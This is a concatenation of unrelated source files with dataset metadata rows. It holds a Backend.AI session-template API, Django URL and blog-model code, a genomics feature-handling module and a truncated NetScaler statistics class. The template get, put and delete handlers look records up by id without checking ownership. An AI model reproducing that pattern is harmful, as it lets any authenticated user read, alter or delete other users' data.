return method(cmis_path, proxy_info, model_inst, kwargs)
| agpl-3.0 | 6,017,278,269,581,853,000 | 39.267241 | 79 | 0.596286 | false |
lablup/backend.ai-manager | src/ai/backend/manager/api/session_template.py | 1 | 14992 | import json
import logging
from typing import (
Any,
List,
Mapping,
TYPE_CHECKING,
Tuple,
)
import uuid
from aiohttp import web
import aiohttp_cors
import sqlalchemy as sa
import trafaret as t
import yaml
from ai.backend.common import validators as tx
from ai.backend.common.logging import BraceStyleAdapter
from ..models import (
association_groups_users as agus, domains,
groups, session_templates, keypairs, users, UserRole,
query_accessible_session_templates, TemplateType,
)
from ..models.session_template import check_task_template
from .auth import auth_required
from .exceptions import InvalidAPIParameters, TaskTemplateNotFound
from .manager import READ_ALLOWED, server_status_required
from .types import CORSOptions, Iterable, WebMiddleware
from .utils import check_api_params, get_access_key_scopes
if TYPE_CHECKING:
from .context import RootContext
log = BraceStyleAdapter(logging.getLogger(__name__))
@server_status_required(READ_ALLOWED)
@auth_required
@check_api_params(t.Dict(
{
tx.AliasedKey(['group', 'groupName', 'group_name'], default='default'): t.String,
tx.AliasedKey(['domain', 'domainName', 'domain_name'], default='default'): t.String,
t.Key('owner_access_key', default=None): t.Null | t.String,
t.Key('payload'): t.String
}
))
async def create(request: web.Request, params: Any) -> web.Response:
if params['domain'] is None:
params['domain'] = request['user']['domain_name']
requester_access_key, owner_access_key = await get_access_key_scopes(request, params)
requester_uuid = request['user']['uuid']
log.info(
'SESSION_TEMPLATE.CREATE (ak:{0}/{1})',
requester_access_key,
owner_access_key if owner_access_key != requester_access_key else '*',
)
user_uuid = request['user']['uuid']
root_ctx: RootContext = request.app['_root.context']
async with root_ctx.db.begin() as conn:
if requester_access_key != owner_access_key:
# Admin or superadmin is creating sessions for another user.
# The check for admin privileges is already done in get_access_key_scope().
query = (
sa.select([keypairs.c.user, users.c.role, users.c.domain_name])
.select_from(sa.join(keypairs, users, keypairs.c.user == users.c.uuid))
.where(keypairs.c.access_key == owner_access_key)
)
result = await conn.execute(query)
row = result.first()
owner_domain = row['domain_name']
owner_uuid = row['user']
owner_role = row['role']
else:
# Normal case when the user is creating her/his own session.
owner_domain = request['user']['domain_name']
owner_uuid = requester_uuid
owner_role = UserRole.USER
query = (
sa.select([domains.c.name])
.select_from(domains)
.where(
(domains.c.name == owner_domain) &
(domains.c.is_active)
)
)
qresult = await conn.execute(query)
domain_name = qresult.scalar()
if domain_name is None:
raise InvalidAPIParameters('Invalid domain')
if owner_role == UserRole.SUPERADMIN:
# superadmin can spawn container in any designated domain/group.
query = (
sa.select([groups.c.id])
.select_from(groups)
.where(
(groups.c.domain_name == params['domain']) &
(groups.c.name == params['group']) &
(groups.c.is_active)
)
)
qresult = await conn.execute(query)
group_id = qresult.scalar()
elif owner_role == UserRole.ADMIN:
# domain-admin can spawn container in any group in the same domain.
if params['domain'] != owner_domain:
raise InvalidAPIParameters("You can only set the domain to the owner's domain.")
query = (
sa.select([groups.c.id])
.select_from(groups)
.where(
(groups.c.domain_name == owner_domain) &
(groups.c.name == params['group']) &
(groups.c.is_active)
)
)
qresult = await conn.execute(query)
group_id = qresult.scalar()
else:
# normal users can spawn containers in their group and domain.
if params['domain'] != owner_domain:
raise InvalidAPIParameters("You can only set the domain to your domain.")
query = (
sa.select([agus.c.group_id])
.select_from(agus.join(groups, agus.c.group_id == groups.c.id))
.where(
(agus.c.user_id == owner_uuid) &
(groups.c.domain_name == owner_domain) &
(groups.c.name == params['group']) &
(groups.c.is_active)
)
)
qresult = await conn.execute(query)
group_id = qresult.scalar()
if group_id is None:
raise InvalidAPIParameters('Invalid group')
log.debug('Params: {0}', params)
try:
body = json.loads(params['payload'])
except json.JSONDecodeError:
try:
body = yaml.safe_load(params['payload'])
except (yaml.YAMLError, yaml.MarkedYAMLError):
raise InvalidAPIParameters('Malformed payload')
template_data = check_task_template(body)
template_id = uuid.uuid4().hex
resp = {
'id': template_id,
'user': user_uuid.hex,
}
query = session_templates.insert().values({
'id': template_id,
'domain_name': params['domain'],
'group_id': group_id,
'user_uuid': user_uuid,
'name': template_data['metadata']['name'],
'template': template_data,
'type': TemplateType.TASK,
})
result = await conn.execute(query)
assert result.rowcount == 1
return web.json_response(resp)
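# Payload sketch for the create handler above (illustrative; the full
# schema is enforced by check_task_template, which is outside this
# excerpt -- only metadata.name is referenced here):
#
#     payload = json.dumps({
#         'metadata': {'name': 'my-template'},
#         # ...remaining fields as required by check_task_template
#     })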
@auth_required
@server_status_required(READ_ALLOWED)
@check_api_params(
t.Dict({
t.Key('all', default=False): t.ToBool,
tx.AliasedKey(['group_id', 'groupId'], default=None): tx.UUID | t.String | t.Null,
}),
)
async def list_template(request: web.Request, params: Any) -> web.Response:
resp = []
access_key = request['keypair']['access_key']
domain_name = request['user']['domain_name']
user_role = request['user']['role']
user_uuid = request['user']['uuid']
log.info('SESSION_TEMPLATE.LIST (ak:{})', access_key)
root_ctx: RootContext = request.app['_root.context']
async with root_ctx.db.begin() as conn:
entries: List[Mapping[str, Any]]
if request['is_superadmin'] and params['all']:
j = (
session_templates
.join(users, session_templates.c.user_uuid == users.c.uuid, isouter=True)
.join(groups, session_templates.c.group_id == groups.c.id, isouter=True)
)
query = (
sa.select([session_templates, users.c.email, groups.c.name], use_labels=True)
.select_from(j)
.where(
(session_templates.c.is_active) &
(session_templates.c.type == TemplateType.TASK)
)
)
result = await conn.execute(query)
entries = []
for row in result:
                is_owner = row.session_templates_user_uuid == user_uuid
entries.append({
'name': row.session_templates_name,
'id': row.session_templates_id,
'created_at': row.session_templates_created_at,
'is_owner': is_owner,
'user': (str(row.session_templates_user_uuid)
if row.session_templates_user_uuid else None),
'group': (str(row.session_templates_group_id)
if row.session_templates_group_id else None),
'user_email': row.users_email,
'group_name': row.groups_name,
})
else:
extra_conds = None
if params['group_id'] is not None:
extra_conds = ((session_templates.c.group_id == params['group_id']))
entries = await query_accessible_session_templates(
conn,
user_uuid,
TemplateType.TASK,
user_role=user_role,
domain_name=domain_name,
allowed_types=['user', 'group'],
extra_conds=extra_conds,
)
for entry in entries:
resp.append({
'name': entry['name'],
'id': entry['id'].hex,
'created_at': str(entry['created_at']),
'is_owner': entry['is_owner'],
'user': str(entry['user']),
'group': str(entry['group']),
'user_email': entry['user_email'],
'group_name': entry['group_name'],
'type': 'user' if entry['user'] is not None else 'group',
})
return web.json_response(resp)
@auth_required
@server_status_required(READ_ALLOWED)
@check_api_params(
t.Dict({
t.Key('format', default='yaml'): t.Null | t.Enum('yaml', 'json'),
t.Key('owner_access_key', default=None): t.Null | t.String,
})
)
async def get(request: web.Request, params: Any) -> web.Response:
if params['format'] not in ['yaml', 'json']:
raise InvalidAPIParameters('format should be "yaml" or "json"')
requester_access_key, owner_access_key = await get_access_key_scopes(request, params)
log.info(
'SESSION_TEMPLATE.GET (ak:{0}/{1})',
requester_access_key,
owner_access_key if owner_access_key != requester_access_key else '*',
)
template_id = request.match_info['template_id']
root_ctx: RootContext = request.app['_root.context']
async with root_ctx.db.begin() as conn:
query = (
sa.select([session_templates.c.template])
.select_from(session_templates)
.where(
(session_templates.c.id == template_id) &
(session_templates.c.is_active) &
(session_templates.c.type == TemplateType.TASK)
)
)
template = await conn.scalar(query)
if not template:
raise TaskTemplateNotFound
template = json.loads(template)
if params['format'] == 'yaml':
body = yaml.dump(template)
return web.Response(text=body, content_type='text/yaml')
else:
return web.json_response(template)
@auth_required
@server_status_required(READ_ALLOWED)
@check_api_params(
t.Dict({
t.Key('payload'): t.String,
t.Key('owner_access_key', default=None): t.Null | t.String,
})
)
async def put(request: web.Request, params: Any) -> web.Response:
template_id = request.match_info['template_id']
requester_access_key, owner_access_key = await get_access_key_scopes(request, params)
log.info(
'SESSION_TEMPLATE.PUT (ak:{0}/{1})',
requester_access_key,
owner_access_key if owner_access_key != requester_access_key else '*',
)
root_ctx: RootContext = request.app['_root.context']
async with root_ctx.db.begin() as conn:
query = (
sa.select([session_templates.c.id])
.select_from(session_templates)
.where(
(session_templates.c.id == template_id) &
(session_templates.c.is_active) &
(session_templates.c.type == TemplateType.TASK)
)
)
result = await conn.scalar(query)
if not result:
raise TaskTemplateNotFound
        try:
            body = json.loads(params['payload'])
        except json.JSONDecodeError:
            try:
                body = yaml.safe_load(params['payload'])
            except (yaml.YAMLError, yaml.MarkedYAMLError):
                raise InvalidAPIParameters('Malformed payload')
template_data = check_task_template(body)
query = (
sa.update(session_templates)
.values(template=template_data, name=template_data['metadata']['name'])
.where((session_templates.c.id == template_id))
)
result = await conn.execute(query)
assert result.rowcount == 1
return web.json_response({'success': True})
@auth_required
@server_status_required(READ_ALLOWED)
@check_api_params(
t.Dict({
t.Key('owner_access_key', default=None): t.Null | t.String,
})
)
async def delete(request: web.Request, params: Any) -> web.Response:
template_id = request.match_info['template_id']
requester_access_key, owner_access_key = await get_access_key_scopes(request, params)
log.info(
'SESSION_TEMPLATE.DELETE (ak:{0}/{1})',
requester_access_key,
owner_access_key if owner_access_key != requester_access_key else '*'
)
root_ctx: RootContext = request.app['_root.context']
async with root_ctx.db.begin() as conn:
query = (
sa.select([session_templates.c.id])
.select_from(session_templates)
.where(
(session_templates.c.id == template_id) &
(session_templates.c.is_active) &
(session_templates.c.type == TemplateType.TASK)
)
)
result = await conn.scalar(query)
if not result:
raise TaskTemplateNotFound
query = (
sa.update(session_templates)
.values(is_active=False)
.where((session_templates.c.id == template_id))
)
result = await conn.execute(query)
assert result.rowcount == 1
return web.json_response({'success': True})
async def init(app: web.Application) -> None:
pass
async def shutdown(app: web.Application) -> None:
pass
def create_app(default_cors_options: CORSOptions) -> Tuple[web.Application, Iterable[WebMiddleware]]:
app = web.Application()
app.on_startup.append(init)
app.on_shutdown.append(shutdown)
app['api_versions'] = (4, 5)
app['prefix'] = 'template/session'
cors = aiohttp_cors.setup(app, defaults=default_cors_options)
cors.add(app.router.add_route('POST', '', create))
cors.add(app.router.add_route('GET', '', list_template))
template_resource = cors.add(app.router.add_resource(r'/{template_id}'))
cors.add(template_resource.add_route('GET', get))
cors.add(template_resource.add_route('PUT', put))
cors.add(template_resource.add_route('DELETE', delete))
return app, []
| lgpl-3.0 | -2,623,418,009,516,440,000 | 36.668342 | 101 | 0.566169 | false |
rachidoulasri/django_projectwebpage | v0/urls.py | 1 | 1118 | """v0 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
#from api.views import ApiDocumentView
from django.conf.urls.static import static
from django.conf import settings
urlpatterns = [
url(r'^', include('authentification.urls')),
url(r'^authentification/', include('authentification.urls')),
url(r'^admin/', include(admin.site.urls)),
]
urlpatterns += staticfiles_urlpatterns()
| mit | -5,645,816,495,818,676,000 | 36.266667 | 79 | 0.726297 | false |
domain51/d51.django.apps.blogs | d51/django/apps/blogs/models.py | 1 | 1309 | from django.db import models
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
class RichTextField(models.TextField):
pass
class Post(models.Model):
internal_title = models.CharField(max_length=255)
display_title = models.CharField(null=True, blank=True, max_length=255)
summary = RichTextField()
content = RichTextField()
meta_keywords = models.CharField(null=True, blank=True, max_length=255)
slug = models.SlugField(unique=True)
author = models.ForeignKey(User, blank=True, null=True)
published = models.DateTimeField()
add_date = models.DateTimeField(auto_now_add=True)
modified_date = models.DateTimeField(auto_now=True)
link = models.CharField(blank=True, null=True, max_length=200)
@property
def title(self):
return self.display_title or self.internal_title
def get_absolute_url(self):
return reverse('post-detail', kwargs={
'year':self.published.year,
'month':self.published.strftime('%b'),
'day':self.published.day,
'slug':self.slug,
})
def __unicode__(self):
return self.title
class Meta:
ordering = ['-published',]
verbose_name = 'blog post'
verbose_name_plural = 'blog posts'
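# Usage sketch (illustrative; assumes a matching 'post-detail' entry in the
# URLconf, as used by get_absolute_url above):
#
#     from django.utils import timezone
#     post = Post.objects.create(internal_title='Hello', summary='...',
#                                content='...', slug='hello',
#                                published=timezone.now())
#     post.get_absolute_url()  # e.g. '/2016/Jan/1/hello/'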
| gpl-3.0 | -3,552,080,607,034,685,400 | 29.44186 | 75 | 0.663866 | false |
fls-bioinformatics-core/RnaChipIntegrator | rnachipintegrator/Features.py | 1 | 19026 | #!/bin/env python
#
# Features.py: classes for handling feature data
# Copyright (C) University of Manchester 2011-2019 Peter Briggs, Leo Zeef
# & Ian Donaldson
#
"""
Features.py
Classes for handling feature data.
"""
import logging
import io
from .distances import closestDistanceToRegion
from .utils import make_errline
class FeatureSet(object):
"""Class for storing a set of features
RNA-seq features consists of genes/transcripts/isomers, which
are stored individually in Feature objects. This class is a
container for a collection of Feature objects and provides
methods to operate on the collection, by creating subsets by
filtering, and sorting the features based on various criteria.
"""
def __init__(self,features_file=None,features_list=None):
"""Create a new FeatureSet instance
Raises an exception if there are errors in the input file data
(non-numeric fields for start/end positions, end positions
occurring before start positions, or illegal strand values).
Arguments:
features_file (str): (optional) the name of an input
file to read the feature data from
features_list (list): (optional) list of Feature objects
to populate the FeatureSet with
"""
self.features = []
self.source_file = None
if features_file:
self.loadFeaturesFromFile(features_file)
elif features_list:
for feature in features_list:
self.addFeature(feature)
def loadFeaturesFromFile(self,features_file):
"""Read features from a file and populate the object
Arguments:
features_file: the name of the input file to read features from.
"""
# Local flags etc
line_index = 0
critical_error = False
# Read in data from file
with io.open(features_file,'rt') as fp:
for line in fp:
# Increment index
line_index += 1
# Skip lines starting with #
if line.startswith('#'):
logging.debug("Feature file: skipped line: %s" %
line.strip())
continue
# Lines are tab-delimited and have at least 5 columns:
# ID chr start end strand
items = line.strip().split('\t')
if len(items) < 5:
logging.warning("Feature file: skipped line: %s" %
line.strip())
logging.warning("Insufficient number of fields (%d)" %
len(items))
continue
# Check line is valid i.e. start and stop should be
# numbers, strand should be + or -
problem_fields = []
if not items[2].isdigit():
problem_fields.append(2)
if not items[3].isdigit():
problem_fields.append(3)
if not (items[4] == '+' or items[4] == '-'):
problem_fields.append(4)
if problem_fields:
# If this is the first line then assume it's a header
# and ignore
if line_index == 1:
logging.warning("%s: first line ignored as header: "
"%s" % (features_file,line.strip()))
else:
# Indicate problem field(s)
logging.error("%s: critical error line %d: bad "
"values:" % (features_file,line_index))
logging.error("%s" % line.strip())
logging.error("%s" % make_errline(line.strip(),
problem_fields))
# This is a critical error: update flag
critical_error = True
# Continue to next line
continue
elif int(items[2]) >= int(items[3]):
# Start position is same or higher than end
logging.error("%s: critical error line %d: 'end' comes "
"before 'start':" % (features_file,
line_index))
logging.error("%s" % line.strip())
logging.error("%s" % make_errline(line.strip(),(2,3)))
# This is a critical error: update flag but continue
# reading
critical_error = True
continue
# Store in a new Feature object
feature = Feature(items[0],
items[1],
items[2],
items[3],
items[4],
source_file=features_file)
# Additional flag
if len(items) >= 6:
# Is column 6 a flag?
try:
flag_value = int(items[5])
if flag_value != 0 and flag_value != 1:
flag_value = None
except ValueError:
flag_value = None
# Store value
feature.flag = flag_value
# Store data
self.features.append(feature)
# Deal with postponed critical errors
if critical_error:
raise Exception("Critical error(s) in '%s'" % features_file)
# Store the source file
self.source_file = features_file
# Return a reference to this object
return self
def addFeature(self,feature):
"""Append a feature to the FeatureSet object
Arguments:
feature: a Feature instance.
"""
self.features.append(feature)
def filterByChr(self,matchChr):
"""Return a subset of features filtered by specified chromosome name
Returns a new FeatureSet object containing only the data from
the current object which matches the specified criteria.
"""
# Make a new (empty) FeatureSet object
feature_subset = FeatureSet()
# Populate with only the matching features
for feature in self.features:
if feature.chrom == matchChr:
feature_subset.addFeature(feature)
return feature_subset
def filterByStrand(self,matchStrand):
"""Return a subset of features filtered by specified strand
Returns a new FeatureSet object containing only the data from
the current object which matches the specified criteria.
"""
# Make a new (empty) FeatureSet object
feature_subset = FeatureSet()
# Populate with only the matching features
for feature in self.features:
if feature.strand == matchStrand:
feature_subset.addFeature(feature)
return feature_subset
def filterByFlag(self,matchFlag):
"""Return a subset of features filtered by flag value
Returns a new FeatureSet object containing only the features from
the current object which matches the specified criteria.
Note that if there is no flag (the "isFlagged()" function returns
False) then an empty set will be returned.
"""
# Make a new (empty) RNASeqData object
feature_subset = FeatureSet()
# Populate with only the matching features
for feature in self.features:
if feature.flag == matchFlag:
feature_subset.addFeature(feature)
return feature_subset
def filterByTSS(self,limit1,limit2,exclude_limits=False):
"""Return a subset of features filtered by TSS position
Returns a new FeatureSet object containing only the features
from the current object where the TSS positions fall within a
region defined by upper and lower limits.
limits can be supplied in either order (i.e. highest/lowest
or lowest/highest).
If exclude_limits is False (the default) then TSS positions
that fall exactly on one of the boundaries are counted as
being within the region; if it is True then these TSS
positions will not be considered to lie inside the region.
"""
# Sort out upper and lower limits
if limit1 > limit2:
upper,lower = limit1,limit2
else:
upper,lower = limit2,limit1
# Make a new (empty) FeatureSet object
feature_subset = FeatureSet()
# Populate with only the matching features
for feature in self.features:
TSS = feature.getTSS()
if exclude_limits:
if lower < TSS and TSS < upper:
feature_subset.addFeature(feature)
else:
if lower <= TSS and TSS <= upper:
feature_subset.addFeature(feature)
return feature_subset
def sortByDistanceFrom(self,position):
"""Sort the features into order based on distance from a position
Sorts the features into order of absolute distance of
their TSS to the specified position (closest first).
Note that this operates on the current object.
"""
self.features = sorted(self.features,
key=lambda record:
abs(record.getTSS()-position))
return self
def sortByClosestEdgeTo(self,position1,position2=None):
"""Sort the features into order based on closest edge (TSS or TES)
Sorts the features into order of smallest absolute distance
to the specified position (closest first), considering both TSS
and TES, using the getClosestEdgeDistanceTo method of the
Feature class.
Note that this operates on the current object.
"""
self.features = sorted(self.features,
key=lambda record:
record.getClosestEdgeDistanceTo(position1,
position2))
return self
def sortByClosestTSSTo(self,position1,position2=None):
"""Sort the features into order based on closest edge to TSS
Sorts the features into order of smallest absolute distance
to the specified position (closest first) to the TSS position,
using the getClosestTSSDistanceTo method of the Feature class.
Note that this operates on the current object.
"""
self.features = sorted(self.features,
key=lambda record:
record.getClosestTSSDistanceTo(position1,
position2))
return self
def isFlagged(self):
"""Check whether feature data includes flags
Checks whether all the Feature records also have a valid flag
associated with them - if yes then returns True (indicating the
dataset as a whole is flagged), otherwise returns False.
"""
# Check all data and look for any None flags
for feature in self.features:
if feature.flag is None:
return False
# All flags valid
return True
def __iter__(self):
return iter(self.features)
def __getitem__(self,key):
try:
start = key.start
stop = key.stop
step = key.step
slice_ = FeatureSet()
for feature in self.features[start:stop:step]:
slice_.addFeature(feature)
return slice_
except AttributeError:
return self.features[key]
def __len__(self):
return len(self.features)
def __eq__(self,other):
if len(self) != len(other):
return False
for f1,f2 in zip(self,other):
if f1 != f2:
return False
return True
def __ne__(self,other):
if len(self) != len(other):
return True
for f1,f2 in zip(self,other):
if f1 != f2:
return True
return False
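# FeatureSet usage sketch (assumes a tab-delimited input file with at
# least the columns ID, chr, start, end and strand):
#
#     features = FeatureSet(features_file='features.txt')
#     chr1 = features.filterByChr('chr1')
#     chr1.sortByDistanceFrom(250000)
#     closest = chr1[0] if len(chr1) else None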
class Feature(object):
"""Class for storing an 'feature' (gene/transcript/isomer)
Access the data for the feature using the object's properties:
id
chrom
start
end
strand
tss
tes
A feature can also have the following optional data
associated with it:
- A source file name, which is set via the 'source_file'
keyword and accessed via the 'source_file' property.
It will be None if no filename has been specified.
There are also convenience methods (getTSS, getTES, getPromoterRegion)
and methods for calculating various distances.
"""
def __init__(self,feature_id,chrom,start,end,strand,source_file=None):
self.id = feature_id
self.chrom = chrom
self.start = int(start)
self.end = int(end)
self.strand = strand
self.flag = None
self.source_file = source_file
# Set the TSS and TES
if self.strand == '+':
self.tss = self.start
self.tes = self.end
elif self.strand == '-':
self.tss = self.end
self.tes = self.start
else:
raise Exception("Bad strand: '%s'" % self.strand)
def __repr__(self):
items = [self.id,
self.chrom,
str(self.start),
str(self.end),
self.strand]
if self.flag != None:
items.append(str(self.flag))
return '\t'.join(items)
def __eq__(self,other):
return \
(self.id == other.id) and \
(self.strand == other.strand) and \
(self.start == other.start) and \
(self.end == other.end)
def __ne__(self,other):
return \
(self.id != other.id) or \
(self.strand != other.strand) or \
(self.start != other.start) or \
(self.end != other.end)
def getTSS(self):
"""Return the TSS coordinate
        TSS (transcription start site) is the start position for a +ve
strand, or end for a -ve strand.
This is a wrapper for accessing the 'tss' property.
"""
return self.tss
def getTES(self):
"""Return the TES coordinate
        TES (transcription end site) is the end position for a +ve
        strand, or start for a -ve strand.
This is a wrapper for accessing the 'tes' property.
"""
return self.tes
def containsPosition(self,coordinate):
"""Check whether a coordinate is within the gene coordinates
Returns True if coordinate lies within start and end, False
otherwise.
"""
return (self.start <= coordinate and coordinate <= self.end)
def getClosestTSSDistanceTo(self,position1,position2=None,
zero_inside_region=False):
"""Return distance from TSS to a coordinate or region
For a single specified position, return the absolute distance
between the position and the TSS.
If a second position is given (specifying a region) then return
smallest absolute distance of (TSS,position1) and (TSS,position2).
By default there is no special treatment when the TSS lies inside
the region specified by two positions; to return zero distance in
these cases, set the 'zero_inside_region' argument to True.
"""
return closestDistanceToRegion(self.getTSS(),
position1,position2,
zero_inside_region)
def getClosestTESDistanceTo(self,position1,position2=None,
zero_inside_region=False):
"""Return distance from TES to a coordinate or region
For a single specified position, return the absolute distance
between the position and the TES.
If a second position is given (specifying a region) then return
smallest absolute distance of (TES,position1) and (TES,position2).
By default there is no special treatment when the TES lies inside
the region specified by two positions; to return zero distance in
these cases, set the 'zero_inside_region' argument to True.
"""
return closestDistanceToRegion(self.getTES(),
position1,position2,
zero_inside_region)
def getClosestEdgeDistanceTo(self,position1,position2=None,
zero_inside_region=False):
"""Return closest edge distance to a coordinate or region
For a single specified position, the closest edge is whichever
of the TSS or TES is nearest (smallest absolute distance) from
that position i.e. the smallest distance of (TSS,position) and
(TES,position).
If a second position is given (specifying a region) then
the closest edge is whichever of the TSS/TES is closest to
either position1 or position2 i.e. the smallest distance of
(TSS,position1), (TES,position1), (TSS,position2) and
(TES,position2).
By default there is no special treatment when either the TSS
or TES lie inside the region specified by two positions; to
set this to zero, set the 'zero_inside_region' argument to
True.
"""
return min(self.getClosestTSSDistanceTo(position1,
position2,
zero_inside_region),
self.getClosestTESDistanceTo(position1,
position2,
zero_inside_region))
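    # Worked example (assuming closestDistanceToRegion returns the smallest
    # absolute distance, as the docstrings above describe): a feature with
    # start=100, end=200 on the '+' strand has TSS=100 and TES=200, so
    # getClosestEdgeDistanceTo(150) = min(|100-150|, |200-150|) = 50.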
def getPromoterRegion(self,to_TSS,from_TSS):
"""Return the coordinates of the promoter region
The promoter region is a region of coordinates around the
TSS of a gene, defined by the supplied distances 'to_TSS'
        (the distance upstream from the TSS) and 'from_TSS' (the
        distance downstream from the TSS).
Returns a tuple containing the start and end coordinates
defining the promoter region.
"""
if self.strand == '+':
return (self.getTSS() - to_TSS,
self.getTSS() + from_TSS)
else:
return (self.getTSS() + to_TSS,
self.getTSS() - from_TSS)
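    # Worked example (per the arithmetic above): a '+' strand feature with
    # TSS at 1000 gives getPromoterRegion(100, 400) == (900, 1400); the
    # same call on a '-' strand feature with TSS at 1000 gives (1100, 600).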
| artistic-2.0 | -4,439,065,279,214,473,700 | 36.087719 | 77 | 0.553716 | false |
mahabs/nitro | nssrc/com/citrix/netscaler/nitro/resource/stat/cmp/cmp_stats.py | 1 | 23212 | #
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class cmp_stats(base_resource) :
def __init__(self) :
self._clearstats = ""
self._delbwsaving = 0
self._delcmpratio = 0
self._decomptcpratio = 0
self._decomptcpbandwidthsaving = 0
self._comptcpratio = 0
self._comptcpbandwidthsaving = 0
self._comptotaldatacompressionratio = 0
self._comphttpbandwidthsaving = 0
self._compratio = 0
self._comptotalrequests = 0
self._comprequestsrate = 0
self._comptotalrxbytes = 0
self._comprxbytesrate = 0
self._comptotaltxbytes = 0
self._comptxbytesrate = 0
self._comptotalrxpackets = 0
self._comprxpacketsrate = 0
self._comptotaltxpackets = 0
self._comptxpacketsrate = 0
self._comptcptotalrxbytes = 0
self._comptcprxbytesrate = 0
self._comptcptotalrxpackets = 0
self._comptcprxpacketsrate = 0
self._comptcptotaltxbytes = 0
self._comptcptxbytesrate = 0
self._comptcptotaltxpackets = 0
self._comptcptxpacketsrate = 0
self._comptcptotalquantum = 0
self._comptcpquantumrate = 0
self._comptcptotalpush = 0
self._comptcppushrate = 0
self._comptcptotaleoi = 0
self._comptcpeoirate = 0
self._comptcptotaltimer = 0
self._comptcptimerrate = 0
self._decomptcprxbytes = 0
self._decomptcprxbytesrate = 0
self._decomptcprxpackets = 0
self._decomptcprxpacketsrate = 0
self._decomptcptxbytes = 0
self._decomptcptxbytesrate = 0
self._decomptcptxpackets = 0
self._decomptcptxpacketsrate = 0
self._decomptcperrdata = 0
self._decomptcperrdatarate = 0
self._decomptcperrlessdata = 0
self._decomptcperrlessdatarate = 0
self._decomptcperrmoredata = 0
self._decomptcperrmoredatarate = 0
self._decomptcperrmemory = 0
self._decomptcperrmemoryrate = 0
self._decomptcperrunknown = 0
self._decomptcperrunknownrate = 0
self._delcomptotalrequests = 0
self._delcomprequestsrate = 0
self._delcompdone = 0
self._delcompdonerate = 0
self._delcomptcprxbytes = 0
self._delcomptcprxbytesrate = 0
self._delcomptcptxbytes = 0
self._delcomptcptxbytesrate = 0
self._delcompfirstaccess = 0
self._delcompfirstaccessrate = 0
self._delcomptcprxpackets = 0
self._delcomptcprxpacketsrate = 0
self._delcomptcptxpackets = 0
self._delcomptcptxpacketsrate = 0
self._delcompbaseserved = 0
self._delcompbaseservedrate = 0
self._delcompbasetcptxbytes = 0
self._delcompbasetcptxbytesrate = 0
self._delcomperrbypassed = 0
self._delcomperrbypassedrate = 0
self._delcomperrbfilewhdrfailed = 0
self._delcomperrbfilewhdrfailedrate = 0
self._delcomperrnostoremiss = 0
self._delcomperrnostoremissrate = 0
self._delcomperrreqinfotoobig = 0
self._delcomperrreqinfotoobigrate = 0
self._delcomperrreqinfoallocfail = 0
self._delcomperrreqinfoallocfailrate = 0
self._delcomperrsessallocfail = 0
self._delcomperrsessallocfailrate = 0
@property
def clearstats(self) :
"""Clear the statsistics / counters.<br/>Possible values = basic, full.
"""
try :
return self._clearstats
except Exception as e:
raise e
@clearstats.setter
def clearstats(self, clearstats) :
"""Clear the statsistics / counters
"""
try :
self._clearstats = clearstats
except Exception as e:
raise e
@property
def delcompbasetcptxbytes(self) :
"""Number of basefile bytes transmitted by NetScaler.
"""
try :
return self._delcompbasetcptxbytes
except Exception as e:
raise e
@property
def comphttpbandwidthsaving(self) :
"""Bandwidth saving from TCP compression expressed as percentage.
"""
try :
return self._comphttpbandwidthsaving
except Exception as e:
raise e
@property
def comptcptotalpush(self) :
"""Number of times the NetScaler compresses data on receiving a TCP PUSH flag from the server. The PUSH flag ensures that data is compressed immediately without waiting for the buffered data size to reach the quantum size.
"""
try :
return self._comptcptotalpush
except Exception as e:
raise e
@property
def delcompfirstaccess(self) :
"""Total number of delta compression first accesses.
"""
try :
return self._delcompfirstaccess
except Exception as e:
raise e
@property
def delcompdone(self) :
"""Total number of delta compressions done by NetScaler.
"""
try :
return self._delcompdone
except Exception as e:
raise e
@property
def comptcptotalrxpackets(self) :
"""Total number of compressible packets received by NetScaler.
"""
try :
return self._comptcptotalrxpackets
except Exception as e:
raise e
@property
def delcomperrbypassed(self) :
"""Number of times delta-compression bypassed by NetScaler.
"""
try :
return self._delcomperrbypassed
except Exception as e:
raise e
@property
def decomptcptxpacketsrate(self) :
"""Rate (/s) counter for decomptcptxpackets.
"""
try :
return self._decomptcptxpacketsrate
except Exception as e:
raise e
@property
def delcompbasetcptxbytesrate(self) :
"""Rate (/s) counter for delcompbasetcptxbytes.
"""
try :
return self._delcompbasetcptxbytesrate
except Exception as e:
raise e
@property
def delbwsaving(self) :
"""Bandwidth saving from delta compression expressed as percentage.
"""
try :
return self._delbwsaving
except Exception as e:
raise e
@property
def comprequestsrate(self) :
"""Rate (/s) counter for comptotalrequests.
"""
try :
return self._comprequestsrate
except Exception as e:
raise e
@property
def comptotaltxbytes(self) :
"""Number of bytes the NetScaler sends to the client after compressing the response from the server.
"""
try :
return self._comptotaltxbytes
except Exception as e:
raise e
@property
def comptcpeoirate(self) :
"""Rate (/s) counter for comptcptotaleoi.
"""
try :
return self._comptcpeoirate
except Exception as e:
raise e
@property
def delcomptcptxbytes(self) :
"""Total number of delta-compressed bytes transmitted by NetScaler.
"""
try :
return self._delcomptcptxbytes
except Exception as e:
raise e
@property
def delcomperrreqinfoallocfail(self) :
"""Number of times requested basefile could not be allocated.
"""
try :
return self._delcomperrreqinfoallocfail
except Exception as e:
raise e
@property
